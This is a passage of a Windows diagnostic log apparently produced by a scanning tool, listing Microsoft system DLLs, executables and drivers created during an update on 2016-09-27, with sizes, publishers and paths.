2016-09-27 13:02 - 2016-09-27 13:02 - 00321792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Phoneutil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00313560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00303968 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\dlnashext.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00289280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NmaDirect.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00282624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_WorkAccess.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00263680 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00261120 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00260096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Phoneutil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00259584 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00248320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00244816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapp3hst.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00239104 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafpos.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapphost.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcpipcfg.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_G18030.DLL
2016-09-27 13:02 - 2016-09-27 13:02 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00204288 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\DscCoreConfProv.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00198144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FSClient.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappcfg.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tcpipcfg.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00172528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00162850 _____ C:\WINDOWS\system32\C_932.NLS
2016-09-27 13:02 - 2016-09-27 13:02 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\system32\XamlTileRender.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00151224 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00141824 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\SysWOW64\DscCoreConfProv.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00137728 _____ (Microsoft Corporation) C:\WINDOWS\system32\wificonnapi.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\system32\slc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\system32\MediaFoundation.DefaultPerceptionProvider.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00133472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00121368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfps.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00121344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakrathunk.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentActivation.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00117240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\IdCtrls.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00108384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.Logon.ProxyStub.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00100864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00097792 _____ (Microsoft Corporation) C:\WINDOWS\system32\NFCProvisioningPlugin.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\dasHost.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappgnui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00089600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\provdatastore.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\BarcodeProvisioningPlugin.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncPolicy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncPolicy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AddressParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\provtool.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00062816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemovableMediaProvisioningPlugin.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iesetup.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ConfigureExpandedStorage.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.Search.UriHandler.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00057400 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappprxy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AddressParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactActivation.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactActivation.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceassociation.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Shell.Search.UriHandler.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00044472 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfpmp.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00041824 _____ (Microsoft Corporation) C:\WINDOWS\system32\SysResetErr.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfdprov.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00036168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfpmp.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\netiougc.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iernonce.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Provisioning.ProxyStub.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\encapi.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00026408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerSvc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netiougc.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slcext.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_IS2022.DLL
2016-09-27 13:02 - 2016-09-27 13:02 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanhlp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanhlp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\c_GSM7.DLL
2016-09-27 13:02 - 2016-09-27 13:02 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\spwmp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\spwmp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccessRes.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccessRes.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdxm.ocx
2016-09-27 13:02 - 2016-09-27 13:02 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxmasf.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msdxm.ocx
2016-09-27 13:02 - 2016-09-27 13:02 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxmasf.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneutilRes.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneutilRes.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneServiceRes.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6r.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 17187840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 13867520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 07792640 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 07654912 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 06109184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 05376000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 04557824 _____ (Microsoft) C:\WINDOWS\SysWOW64\dbgeng.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 03435008 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 03116544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAJApi.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02947072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02913104 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02820096 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02423296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAJApi.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02289664 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02166232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02107392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02083840 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01993216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01755136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceFlows.DataModel.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01508864 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 01461200 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01435896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01029632 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01006080 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00936448 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00905216 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00820736 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingOnlineServices.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00806912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00773200 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00761344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00755200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00681304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ClipSp.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00619368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00601200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00584544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2016-09-27 13:01 - 2016-09-27 13:01 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qdvd.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00536576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingOnlineServices.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00526848 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2016-09-27 13:01 - 2016-09-27 13:01 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00461312 _____ (Microsoft) C:\WINDOWS\SysWOW64\DbgModel.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00446464 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosResource.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosResource.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00389000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtapi.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00380928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\NmaDirect.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00331264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00327680 _____ (Microsoft Corporation) C:\WINDOWS\system32\container.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapp3hst.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00302592 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapphost.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00297552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wevtapi.dll
